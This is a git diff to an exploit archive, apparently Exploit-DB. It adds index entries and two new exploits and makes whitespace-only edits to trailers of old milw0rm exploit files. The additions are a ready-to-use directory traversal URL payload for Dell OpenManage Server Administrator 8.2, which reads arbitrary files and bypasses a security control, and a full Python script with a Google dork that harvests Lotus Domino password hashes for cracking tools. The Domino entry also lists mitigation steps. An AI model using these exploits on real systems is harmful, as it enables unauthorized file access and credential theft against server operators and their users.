diff --git a/files.csv b/files.csv index e15433ab3..1532ba4bd 100755 --- a/files.csv +++ b/files.csv @@ -35723,6 +35723,7 @@ id,file,description,date,author,platform,type,port 39483,platforms/multiple/dos/39483.txt,"Wireshark - add_ff_vht_compressed_beamforming_report Static Out-of-Bounds Read",2016-02-22,"Google Security Research",multiple,dos,0 39484,platforms/multiple/dos/39484.txt,"Wireshark - dissect_ber_set Static Out-of-Bounds Read",2016-02-22,"Google Security Research",multiple,dos,0 39485,platforms/asp/webapps/39485.txt,"Thru Managed File Transfer Portal 9.0.2 - SQL Injection",2016-02-22,"SySS GmbH",asp,webapps,80 +39486,platforms/windows/webapps/39486.txt,"Dell OpenManage Server Administrator 8.2 - Authenticated Directory Traversal",2016-02-23,hantwister,windows,webapps,0 39487,platforms/multiple/dos/39487.py,"libquicktime 1.2.4 - Integer Overflow",2016-02-23,"Marco Romano",multiple,dos,0 39488,platforms/json/webapps/39488.txt,"Ubiquiti Networks UniFi 3.2.10 - CSRF Vulnerability",2016-02-23,"Julien Ahrens",json,webapps,8443 39489,platforms/php/webapps/39489.py,"WordPress Extra User Details Plugin 0.4.2 - Privilege Escalation",2016-02-24,"Panagiotis Vagenas",php,webapps,80 @@ -35731,3 +35732,4 @@ id,file,description,date,author,platform,type,port 39492,platforms/linux/dos/39492.txt,"libxml2 - xmlParseEndTag2 Heap-Based Buffer Overread",2016-02-24,"Google Security Research",linux,dos,0 39493,platforms/linux/dos/39493.txt,"libxml2 - xmlParserPrintFileContextInternal Heap-Based Buffer Overread",2016-02-24,"Google Security Research",linux,dos,0 39494,platforms/linux/dos/39494.txt,"libxml2 - htmlCurrentChar Heap-Based Buffer Overread",2016-02-24,"Google Security Research",linux,dos,0 +39495,platforms/windows/webapps/39495.py,"IBM Lotus Domino <= R8 Password Hash Extraction Exploit",2016-02-25,"Jonathan Broche",windows,webapps,0 diff --git a/platforms/bsd/remote/105.pl b/platforms/bsd/remote/105.pl index db156664d..b656f7eb0 100755 --- a/platforms/bsd/remote/105.pl +++ b/platforms/bsd/remote/105.pl @@ -41,6 +41,6 @@ sleep(1); #you might have to adjust this on slow connections print $socket $buf; close($socket); - - -# milw0rm.com [2003-09-27] + + +# milw0rm.com [2003-09-27] diff --git a/platforms/linux/dos/115.c b/platforms/linux/dos/115.c index 16142b5bf..9d034e388 100755 --- a/platforms/linux/dos/115.c +++ b/platforms/linux/dos/115.c @@ -105,6 +105,6 @@ void usage( char *program ) fprintf(stdout, "USAGE: <%s> \n", program); exit(0); } - - -// milw0rm.com [2003-10-31] + + +// milw0rm.com [2003-10-31] diff --git a/platforms/linux/dos/68.c b/platforms/linux/dos/68.c index 185fa7fe0..2dae827a8 100755 --- a/platforms/linux/dos/68.c +++ b/platforms/linux/dos/68.c @@ -67,6 +67,6 @@ int main(void) (xdrproc_t) xdr_void, NULL, tv); return 0; -} - -// milw0rm.com [2003-07-29] +} + +// milw0rm.com [2003-07-29] diff --git a/platforms/linux/local/104.c b/platforms/linux/local/104.c index 4dd26f13d..9bda8dee2 100755 --- a/platforms/linux/local/104.c +++ b/platforms/linux/local/104.c @@ -55,6 +55,6 @@ int main() execle (BIN, BIN, "-I", out, 0x0, own, 0x0); } - - -// milw0rm.com [2003-09-21] + + +// milw0rm.com [2003-09-21] diff --git a/platforms/linux/local/12.c b/platforms/linux/local/12.c index 720d6ec07..53db2480c 100755 --- a/platforms/linux/local/12.c +++ b/platforms/linux/local/12.c @@ -198,6 +198,6 @@ int main(int ac, char **av) return 0; } - - -// milw0rm.com [2003-04-14] + + +// milw0rm.com [2003-04-14] diff --git a/platforms/linux/local/21.c b/platforms/linux/local/21.c index 62259225f..36cc043cc 100755 --- a/platforms/linux/local/21.c +++ b/platforms/linux/local/21.c @@ -256,6 +256,6 @@ void banrl() fprintf(stdout," by Xpl017Elz\n\n"); } - - -// milw0rm.com [2003-04-29] + + +// milw0rm.com [2003-04-29] diff --git a/platforms/linux/local/72.c b/platforms/linux/local/72.c index 76e77e449..1076d28b1 100755 --- a/platforms/linux/local/72.c +++ b/platforms/linux/local/72.c @@ -63,6 +63,6 @@ putenv(egg); execl(BIN,BIN,"-display",buff,NULL); } - - -// milw0rm.com [2003-08-01] + + +// milw0rm.com [2003-08-01] diff --git a/platforms/linux/local/91.c b/platforms/linux/local/91.c index d01a84040..bd93115b3 100755 --- a/platforms/linux/local/91.c +++ b/platforms/linux/local/91.c @@ -137,6 +137,6 @@ SSL_FILETYPE_PEM) <= 0) if (!SSL_CTX_check_private_key(ctx)) exit(1); } - - -// milw0rm.com [2003-09-05] + + +// milw0rm.com [2003-09-05] diff --git a/platforms/linux/remote/110.c b/platforms/linux/remote/110.c index ba05d56bb..145079db6 100755 --- a/platforms/linux/remote/110.c +++ b/platforms/linux/remote/110.c @@ -698,6 +698,6 @@ struct timespec t; t.tv_sec=0; t.tv_nsec=n; nanosleep(&t,&t); -} - -// milw0rm.com [2003-10-13] +} + +// milw0rm.com [2003-10-13] diff --git a/platforms/linux/remote/63.c b/platforms/linux/remote/63.c index 0fa07bd8f..9bb78e582 100755 --- a/platforms/linux/remote/63.c +++ b/platforms/linux/remote/63.c @@ -535,6 +535,6 @@ int main(int argc, char **argv) return 0; } - - -// milw0rm.com [2003-07-25] + + +// milw0rm.com [2003-07-25] diff --git a/platforms/linux/remote/88.c b/platforms/linux/remote/88.c index 26a1cb8ca..cdf1d7cb9 100755 --- a/platforms/linux/remote/88.c +++ b/platforms/linux/remote/88.c @@ -418,6 +418,6 @@ void usage(char *name){ " -d\t\tdo not show verbose ftp in/out traffic.\n\n", name,port,sport,DFLUSER,DFLPASS,DFLDIR,DFLADDR,align,attempts); exit(0); -} - -// milw0rm.com [2003-08-28] +} + +// milw0rm.com [2003-08-28] diff --git a/platforms/linux/remote/89.c b/platforms/linux/remote/89.c index b80c0b6bb..27545718f 100755 --- a/platforms/linux/remote/89.c +++ b/platforms/linux/remote/89.c @@ -330,6 +330,6 @@ void sendstr(int sd,char *str,int length) write(sd,str,length); sleep(1); } - - -// milw0rm.com [2003-08-29] + + +// milw0rm.com [2003-08-29] diff --git a/platforms/linux/remote/98.c b/platforms/linux/remote/98.c index ad7a57a9f..854c812a5 100755 --- a/platforms/linux/remote/98.c +++ b/platforms/linux/remote/98.c @@ -290,6 +290,6 @@ void sqlerror(char *s) fprintf(stderr,"FAILED\n[-] %s:%s\n",s,mysql_error(conn)); mysql_close(conn); exit(0); -} - -// milw0rm.com [2003-09-14] +} + +// milw0rm.com [2003-09-14] diff --git a/platforms/multiple/remote/67.c b/platforms/multiple/remote/67.c index 33e4b63ed..d51bc1563 100755 --- a/platforms/multiple/remote/67.c +++ b/platforms/multiple/remote/67.c @@ -333,6 +333,6 @@ void my_sleep(int n) { t.tv_sec=0; t.tv_nsec=n; nanosleep(&t,&t); -} - -// milw0rm.com [2003-07-28] +} + +// milw0rm.com [2003-07-28] diff --git a/platforms/windows/dos/65.c b/platforms/windows/dos/65.c index b79a57617..745522eb1 100755 --- a/platforms/windows/dos/65.c +++ b/platforms/windows/dos/65.c @@ -108,6 +108,6 @@ int main(int argc, char* argv[]) Exit0: return 0; -} - -// milw0rm.com [2003-07-25] +} + +// milw0rm.com [2003-07-25] diff --git a/platforms/windows/dos/73.c b/platforms/windows/dos/73.c index f77be91da..733e53e70 100755 --- a/platforms/windows/dos/73.c +++ b/platforms/windows/dos/73.c @@ -144,6 +144,6 @@ int main(int argc, char **argv) WSACleanup(); -} - -// milw0rm.com [2003-08-01] +} + +// milw0rm.com [2003-08-01] diff --git a/platforms/windows/remote/112.c b/platforms/windows/remote/112.c index 879cbbad1..1079c6c9d 100755 --- a/platforms/windows/remote/112.c +++ b/platforms/windows/remote/112.c @@ -87,6 +87,6 @@ int main(int argc, char *argv[]) { exit(1); } } - - -// milw0rm.com [2003-10-21] + + +// milw0rm.com [2003-10-21] diff --git a/platforms/windows/remote/83.html b/platforms/windows/remote/83.html index 10f4581ed..e764a4605 100755 --- a/platforms/windows/remote/83.html +++ b/platforms/windows/remote/83.html @@ -99,6 +99,6 @@ f.Close Set shell=CreateObject("WScript.Shell") shell.run(pth) - - -// milw0rm.com [2003-08-21] + + +// milw0rm.com [2003-08-21] diff --git a/platforms/windows/remote/90.c b/platforms/windows/remote/90.c index 762ce32c2..bb4c90e7f 100755 --- a/platforms/windows/remote/90.c +++ b/platforms/windows/remote/90.c @@ -218,6 +218,6 @@ main (int argc, char *argv[]) return 0; /* dead code */ } - - -// milw0rm.com [2003-09-01] + + +// milw0rm.com [2003-09-01] diff --git a/platforms/windows/webapps/39486.txt b/platforms/windows/webapps/39486.txt new file mode 100755 index 000000000..d8f875acd --- /dev/null +++ b/platforms/windows/webapps/39486.txt @@ -0,0 +1,27 @@ +# Exploit Title: Dell OpenManage Server Administrator 8.2 Authenticated +Directory Traversal +# Date: February 22, 2016 +# Exploit Author: hantwister +# Vendor Homepage: http://www.dell.com/ +# Software Link: +http://www.dell.com/support/contents/us/en/19/article/Product-Support/Self-support-Knowledgebase/enterprise-resource-center/Enterprise-Tools/OMSA +# Version: 8.2 +# Tested on: Windows 7 x64 + +When authenticated as an admin, make the following adjustments to the URL +below: + +1) Substitute "" for the target; +2) Substitute "Windows\WindowsUpdate.log" for the desired file; +3) Substitute the value of the vid parameter and the folder name preceding +"/ViewFile" with the vid parameter from your current session. + +https:// +:1311/0123456789ABCDEF/ViewFile?path=\temp&file=hello\..\..\..\..\..\..\..\..\Windows\WindowsUpdate.log&vid=0123456789ABCDEF + +In the file parameter, "hello" can be changed to any other name; the folder +need not exist. However, the file parameter must not start with a common +file path separator, nor a dot character. + +The path parameter should not be changed; the provided value is essential +to bypassing a security control. \ No newline at end of file diff --git a/platforms/windows/webapps/39495.py b/platforms/windows/webapps/39495.py new file mode 100755 index 000000000..90b6e9aba --- /dev/null +++ b/platforms/windows/webapps/39495.py @@ -0,0 +1,103 @@ +# Exploit Title: IBM Lotus Domino <= R8 Password Hash Extraction Exploit +# Google Dork: inurl:names.nsf?opendatabase +# Date: 02-24-2016 +# Exploit Author: Jonathan Broche +# Contact: https://twitter.com/g0jhonny +# Vendor Homepage: https://www-01.ibm.com/software/lotus/category/messaging/ +# Tested on: Lotus Domino 8.5 +# CVE : CVE-2005-2428 + +1. Description + +IBM Domino Databases contain a configuration issue allowing users to obtain password hashes, configuraiton information and more from the Public Address Book (i.e., names.nsf database). Password hashes are obtained from the hidden HTML HTTPPassword and dspHTTPPassword fields per user in the database. + +2. Proof of Concept + +#!/usr/bin/env python2 + +import requests, re, BeautifulSoup, sys, argparse, os +requests.packages.urllib3.disable_warnings() + + +parser = argparse.ArgumentParser(description='Domino Effect - A Lotus Domino password hash tool by Jonathan Broche (@g0jhonny)', version="1.0") +parser.add_argument('system', help="IP address or hostname to harvest hashes from. ") +parser.add_argument('-u', '--uri', metavar='path', default="/names.nsf", help="Path to the names.nsf file. [Default: /names.nsf]") +outgroup = parser.add_argument_group(title="Output Options") +outgroup.add_argument('--hashcat', action='store_true', help="Print results for use with hashcat.") +outgroup.add_argument('--john', action='store_true', help="Print results for use with John the Ripper.") + +if len(sys.argv) == 1: + parser.print_help() + sys.exit(1) + +args = parser.parse_args() +print "\nDomino Effect {}\n".format(parser.version) + +headers={'User-Agent':'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3'} + + +try: + response = requests.get("https://{}{}/People?OpenView".format(args.system, args.uri), verify=False, headers=headers, timeout=3) +except requests.exceptions.Timeout as e: + print "[!] Timed out, try again." + sys.exit(1) +except Exception as e: + print e + +soup = BeautifulSoup.BeautifulSoup(response.text) + +links = [] + +#grab all user profile links +for link in soup.findAll('a'): + if "OpenDocument" in link['href']: + if link['href'] not in links: + links.append(link['href']) + +hashes = {} +for link in links: #get user profile + try: + response = requests.get("https://{}{}".format(args.system, link), verify=False, headers=headers, timeout=2) + except requests.exceptions.Timeout as e: + pass + except Exception as e: + print e + + if response.text: + soup = BeautifulSoup.BeautifulSoup(response.text) + + name = soup.find('input', {'name' : '$dspShortName'}).get('value').strip() #short name + httppassword = soup.find('input', { "name" : "HTTPPassword"}).get('value').strip() + dsphttppassword = soup.find('input', { "name" : "dspHTTPPassword"}).get('value').strip() + + if httppassword and httppassword not in hashes.keys(): + hashes[httppassword] = name + elif dsphttppassword and dsphttppassword not in hashes.keys(): + hashes[dsphttppassword] = name + +if hashes: #output + if args.hashcat or args.john: + if args.hashcat: + for h in hashes.keys(): + print h + if args.john: + for h, n in hashes.items(): + print "{}:{}".format(n,h) + else: + for h, n in hashes.items(): + print "[*] User: {} Hash: {}".format(n, h) + + +print "\n{} hashes obtained\n".format(len(hashes)) + +3. Solution + +To hide the HTTP password from the HTML source: + +1) Open the $PersonalInheritableSchema subform (In the designer under Shared Code, Subforms). +2) Find the fields: $dspHTTPPassword and HTTPPassword. +3) In the field properties for both fields, on the hide tab under "Hide paragram from" check off "Web browsers". +4) Open the Person form (Under Forms). +5) In the form properties, on the 2nd tab, disable the option "Generate HTML for all fields". + +In addition, ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other senstive files. \ No newline at end of file